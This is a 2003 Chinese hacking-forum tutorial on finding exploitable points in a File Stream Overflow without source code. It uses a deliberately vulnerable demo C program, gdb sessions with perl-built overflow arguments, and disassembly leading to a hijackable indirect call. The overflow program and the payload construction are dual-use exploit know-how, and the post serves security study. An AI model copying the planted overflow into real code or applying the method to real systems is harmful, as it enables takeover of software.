标题:
漏洞利用的方法之研究~`````
[打印本页]
作者:
blacksabre
时间:
2003-5-25 14:58
标题:
漏洞利用的方法之研究~`````
作者:noble 邮箱:noble_shi@21cn.com 声明: (1)本文可以任意修改,不过请保留该头。 (2)由于作者水平有限,如有错误,请不吝赐教。 (3)本文中引用了alert7大侠的一个例子。 目录: (1)前言 (2)漏洞利用方法 (3)结论(如果能看懂,第一、二部分可以略去) 1.前言 先说一些废话把。 昨天看了altert7的FSO(File Stream Overflows)型溢出介绍后,觉得写一写漏洞利用方法还是有必要的。 对于有源码的,那当然要简单一些。但是通常情况下读源码很费劲,而且需要大量的后备知识,所以相对来说还是比较困难。以前我也这么做过,确实不易。相对来说,发现程序出错,然后在出错的地方寻找漏洞,相对来说还是要简单一些。 下面的讨论我们都假设没有源码可查,在黑暗中摸索漏洞。 为了我自己方便期间,也为了大家读起来熟悉,我们还用alert7先生的那个FSO可溢出的程序作为例子。 2.漏洞利用方法 下面是alert7的一个可以被FSO溢出的例子,我们在这里引用。 /* *vul.c demo *write by alert7@xfocus.org */ #include
int main(int argc, char *argv[]) { FILE * fp; char buf[1024]; int i; fp =stdout; i = (int)&fp-(int)&buf; printf(" fp addr %p point %p\nbuf addr %p\n len %d\n",&fp,fp,buf,i); strncpy(buf,argv[1],i +4 ); fprintf(fp,"%s\n",buf); exit(0); } 首先我们编译、运行之,发现出错了,如下: bash-2.05$ ./vul fp addr 0xbffff9ac point 0x4015ee60 buf addr 0xbffff5a0 len 1036 Segmentation fault 然后用gdb调试,注意,我们这里假设已经知道用多个“A”做参数程序会出错,则如下: bash-2.05$ gdb -q vul (gdb) r `perl -e ''print "A"x2000''` Starting program: /home/syf/syf/try/vul `perl -e ''print "A"x2000''` fp addr 0xbfffe6bc point 0x4015ee60 buf addr 0xbfffe2b0 len 1036 Program received signal SIGSEGV, Segmentation fault. 0x4007fe77 in _IO_vfprintf (s=0x41414141, format=0x804866a "%s\n", ap=0xbfffe298) at vfprintf.c:271 271 vfprintf.c: No such file or directory. in vfprintf.c (gdb) i r eax edx eip eax 0x41414141 1094795585 edx 0x804866a 134514282 eip 0x4007fe77 0x4007fe77 然后应该怎么办那,首先要看看出错的那条指令是什么: (gdb) x/i $eip 0x4007fe77 <_IO_vfprintf+55>: cmpb $0x0,0x46(%eax) 不爽,这条指令是cmpb ,这对我们可没什么用,我们需要的是call, jmp之类的东西。所以我们在构造参数的时候,需要源程序执行时能越过这条指令,看看越过这条指令之后,再次出错时,能不能碰到call或jmp之类的我们可以利用的指令。 那么,怎么构造参数才能越过这条指令呢?分析一下问什么会出错把,正如altert7所说,“ 现在我们的fp已经被覆盖成了0x41414141,该地址是没有映射的,所以cmpb $0x0,0x46(%eax) 指令操作失败了”,不错,我们要将$0x0和0x46(%eax)做比较,那就是将$0x0和 (%eax+46)==(0x41414141+46)做比较,必然出错。那么只要我们能让eax是一个已经在内存中映射了的值就行了。那就需要我们构造合适的参数了。 在这个程序中,altert7大侠告诉了我们eax就是fp,如果不知道,而且由源码,那该怎么办呢?继续分析把! (gdb) x/10i $eip - 0x10 0x4007fe67 <_IO_vfprintf+39>: call 0x40046050 <_dl_pagesize+193620> 0x4007fe6c <_IO_vfprintf+44>: mov (%eax),%eax 0x4007fe6e <_IO_vfprintf+46>: mov %eax,0xfffffa80(%ebp) 0x4007fe74 <_IO_vfprintf+52>: mov 0x8(%ebp),%eax 0x4007fe77 <_IO_vfprintf+55>: cmpb $0x0,0x46(%eax) 0x4007fe7b <_IO_vfprintf+59>: je 0x40084a80 <_IO_vfprintf+19520> 0x4007fe81 <_IO_vfprintf+65>: mov 0x8(%ebp),%esi 0x4007fe84 <_IO_vfprintf+68>: mov (%esi),%eax 0x4007fe86 <_IO_vfprintf+70>: test $0x8,%eax 0x4007fe8b <_IO_vfprintf+75>: je 0x4007feb0 <_IO_vfprintf+112> 从上面可以看到eax的户籍:mov 0x8(%ebp),%eax,那么ebp是什么呢?众所周知,ebp是函数堆栈栈顶指针,那么0x8(%ebp)就应该是函数_IO_vfprintf()的第一个参数,那么我们会猜到,这个函数的第一个参数很可能就是FILE指针。不信,你可以看看glibc,这玩艺可是公开的,当然在没有源码的情况下你可以做测试呀,来验证你的想法。不过这里即使知道了是FILE指针。 下面,继续寻找改变eax的方法,我还没想到特别好的方法,那就做测试把,改变参数,不停的测试,直到(gdb) r `perl -e ''print "A"x1037''`,我们发现: (gdb) r `perl -e ''print "A"x1037''` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/syf/syf/try/vul `perl -e ''print "A"x1037''` fp addr 0xbfffdc8c point 0x4015ee60 buf addr 0xbfffd880 len 1036 Program received signal SIGSEGV, Segmentation fault. 0x4007fe77 in _IO_vfprintf (s=0x41, format=0x804866a "%s\n", ap=0xbfffd868) at vfprintf.c:271 271 vfprintf.c: No such file or directory. in vfprintf.c (gdb) i r eax eax 0x41 65 好了,我们知道了,当长度是1036时,正好不改变eax的值,当长度是1040时,正好改变eax的值。 联系刚才说的那个FILE指针,你能不能猜到当长度是1036时,正好不会覆盖一个FILE指针,而长度是当长度是1040时,正好会覆盖它呢?不过即使你猜不到也没关系,你只需要知道eax是函数_IO_vfprintf()的第一个参数,而这个参数正好和我们参数长度是1036指向的那个内存中的数据等就行了。 下面我们就把1036-1040改为已经映射了的内存。简单的,随便选取一个把,为了兼容,我选取了alert7的那个,我试了,用别的也可以,不过不能有\x00,那样字符串复制就会产生中断。 继续如下: (gdb) r `perl -e ''print "A"x1036 ;print "\x04\xf4\xff\xbf"''` Starting program: /home/syf/syf/try/vul `perl -e ''print "A"x1036 ;print "\x04\xf4\xff\xbf"''` fp addr 0xbfffe3fc point 0x4015ee60 buf addr 0xbfffdff0 len 1036 Program received signal SIGSEGV, Segmentation fault. 0x40080008 in _IO_vfprintf (s=0xbffff404, format=0x804866a "%s\n", ap=0xbfffdfd8) at vfprintf.c:1322 1322 vfprintf.c: No such file or directory. in vfprintf.c 好了,又出现错误了,看看这次出错的指令是什么: (gdb) x/i $eip 0x40080008 <_IO_vfprintf+456>: call *0x1c(%eax) 太好了,是call,有希望了。但是还有一个困难,也是最重要的一点,就是我们能否控制eax,只要我们控制了eax,也就控制了程序的流程。下面看看相关的指令把: (gdb) x/20i $eip-40 0x4007ffe0 <_IO_vfprintf+416>: je 0x40084a00 <_IO_vfprintf+19392> 0x4007ffe6 <_IO_vfprintf+422>: mov 0x8(%ebp),%edx 0x4007ffe9 <_IO_vfprintf+425>: sub $0x4,%esp 0x4007ffec <_IO_vfprintf+428>: mov 0xfffffa74(%ebp),%edi 0x4007fff2 <_IO_vfprintf+434>: mov 0xc(%ebp),%esi 0x4007fff5 <_IO_vfprintf+437>: movsbl 0x46(%edx),%eax 0x4007fff9 <_IO_vfprintf+441>: sub %esi,%edi 0x4007fffb <_IO_vfprintf+443>: mov 0x94(%eax,%edx,1),%eax 0x40080002 <_IO_vfprintf+450>: push %edi 0x40080003 <_IO_vfprintf+451>: mov 0xc(%ebp),%ecx 0x40080006 <_IO_vfprintf+454>: push %ecx 0x40080007 <_IO_vfprintf+455>: push %edx 0x40080008 <_IO_vfprintf+456>: call *0x1c(%eax) 0x4008000b <_IO_vfprintf+459>: add $0x10,%esp 0x4008000e <_IO_vfprintf+462>: cmp %edi,%eax 0x40080010 <_IO_vfprintf+464>: je 0x40080094 <_IO_vfprintf+596> 0x40080016 <_IO_vfprintf+470>: lea 0x0(%esi),%esi 0x40080019 <_IO_vfprintf+473>: lea 0x0(%edi,1),%edi 0x40080020 <_IO_vfprintf+480>: mov $0xffffffff,%esi 0x40080025 <_IO_vfprintf+485>: mov %esi,0xfffffa90(%ebp) 我们又要查找eax的户籍了,自下而上依次是: call *0x1c(%eax) mov 0x94(%eax,%edx,1),%eax movsbl 0x46(%edx),%eax 看看edx把: mov 0x8(%ebp),%edx 好了,我们知道了edx是改函数_IO_vfprintf()的第一个参数,也就是在参数长度为1036时指向的那个内存。(如果你猜到那里有个FILE指针的话,那也就是那个FILE指针)。 差不多了,现在只要我们改变这个内存的值(参数长度为1036时指向的那个内存),就可以控制程序的流程了。怎么控制呢?如下: (1)_IO_vfprintf()的第一个参数==参数长度为1036时指向的那个内存 (2)edx = 0x8(%ebp) = _IO_vfprintf()的第一个参数 (3)eax = 0x94(%eax,%edx,1) = *(eax + 0x94 + edx*1) = *(*(edx+46) + 0x94 + edx) (4)call *0x1c(%eax) 所以,只要我们能够控制edx,就可以控制call *0x1c(%eax),即可以改变程序流程。从上面可以看出,要控制edx,只要能够控制_IO_vfprintf()的第一个参数即可,而这个参数,就是参数长度为1036时指向的那个内存。 通过上面分析,可以知道,这个程序完全可以通过溢出获取系统控制权。而到现在为止,虽然我们能够写出相应的溢出代码了,但并不需要我们对源码进行了解,更不需要知道源码中用了那些数据结构和那些算法,完全从出错程序的反汇编就可以写出溢出代码。 3.结论 通过以上分析,我们可以得出如下结论: (1)对于某些溢出,完全可以不用分析源码就可以写出溢出代码。当然如果有源码那就更好了。 (2)必须知道溢出的边界。即当输入生么样的参数时,正好溢出。就像我们上面确定的那个“1036“那样的临界值。对于这个值的确定,我还没有太好的办法,只能不停的测试。如果那位大侠有更好的办法,希望不吝赐教。 (3)我们能够利用的指令是call,jmp之类。当然不至于这些,mov之类写内存的应该也是可以的,这类指令应该可以导致堆溢出(heap-overflow)。 (4)如果我们出错的位置是我们不能利用的代码,那么就要想办法来越过这些代码,寻找下一条出错指令。 就像上面的例子,我们遇到的第一条出错指令是cmpb $0x0,0x46(%eax),这是我们所不能利用的,所以我们要修改参数,使得程序执行越过这条出错指令,继续运行,并分析下遇到的下一条出错指令是否可以利用,实践证明下一个出错指令(call *0x1c(%eax))是可以被利用的。 (5)和整形溢出向比较,FSO是在其他溢出(如栈溢出、堆溢出、格式化字符串溢出等)的基础上形成的,通过其他溢出,达到覆盖流文件句柄的目的。而整形溢出则恰恰相反,如果整形除了问题,可以导致其他溢出(如栈溢出、堆溢出、格式化字符串溢出等)。 2003-4-21 载自蓝雪科技~!
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2